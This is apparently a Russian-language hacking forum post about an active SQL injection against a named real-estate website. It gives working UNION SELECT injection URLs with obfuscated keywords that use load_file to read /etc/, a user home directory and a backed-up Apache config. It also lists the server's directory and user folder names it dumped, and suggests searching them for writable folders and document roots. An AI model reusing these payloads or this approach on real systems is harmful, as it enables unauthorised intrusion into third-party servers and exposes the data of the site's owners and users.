|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от huntercs16
↑
Все хорошо, но
Код:
_SERVER["SCRIPT_FILENAME"] /home/lwdhost/www/live.realcove.com/index.php
http://5788sagebrookdrive.com/phpinfo.php
Br@!ns
Аналогично, /etc/passwd,говорит как раз что www-юзер имеет /home/lwdhost.
радость-то какая, наконец-то могу пощупать эту фишку freebsd:
Код:
http://5788sagebrookdrive.com/property-details?mls=-1%27+/*!uNIoN*/+%28/*!SelEcT*/+123,123,load_file%28%27/etc/%27%29,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,123,1+%29+--+;&src=1
т. е. при чтении директории получаете список файлов и папок
директория /home/lwdhost/
Код:
http://5788sagebrookdrive.com/property-details?mls=-1%27+/*!uNIoN*/+%28/*!SelEcT*/+123,123,load_file%28%27/home/lwdhost/%27%29,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,123,1+%29+--+;&src=1
почему такая ерунда с папками? в httpd прописаны алиасы:
Код:
http://5788sagebrookdrive.com/property-details?mls=-1%27+/*!uNIoN*/+%28/*!SelEcT*/+1,1,1,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,load_file%28%27/home/MPS.httpd.conf.bk25oct2010%27%29,1+%29+--+;&src=1
Код:
addisonklein
advancedlabs
brian
brian1
cameron
canon-copier
coldwellca
cortexx
dns
formbuilder
grijalva
impact
jennie
jira
lwdhost
mayer
mlsimages
olyins
outgoing
pcmls
puddlejumpers
riverbendranch
ryanm
steve1
tara
theofficialjeff
tyler
unixsa
vera
koliopoulos
gsmls
MPS.httpd.conf.bk25oct2010
MPS.php.ini.bk25oct2010
VPS.httpd.conf.bk25oct2010
VPS.php.ini.bk25oct2010
нужно перебрать все папки и найти доступную на чтение и запись, заодно найти httpd.conf и найти для каждого document_root
|